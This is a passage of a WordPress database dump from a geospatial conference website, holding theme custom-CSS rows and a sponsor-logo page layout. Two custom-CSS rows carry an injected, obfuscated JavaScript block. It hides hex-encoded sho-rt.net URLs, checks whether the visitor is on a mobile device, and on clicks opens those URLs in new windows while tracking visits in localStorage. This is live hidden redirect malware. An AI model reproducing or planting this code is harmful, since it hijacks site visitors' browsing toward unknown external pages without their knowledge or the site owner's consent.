_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','publish','closed','closed','','dt-the7','','','2023-06-28 09:37:04','2023-06-28 09:37:04','',0,'https://gsw2023.com/index.php/2023/06/25/dt-the7/',0,'custom_css','',0),
(4824,4,'2023-06-25 16:04:58','2023-06-25 16:04:58','.menu-text:hover{\n	cursor: pointer !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-25 16:04:58','2023-06-25 16:04:58','',4823,'https://gsw2023.com/?p=4824',0,'revision','',0),
(4825,4,'2023-06-25 16:21:30','2023-06-25 16:21:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" 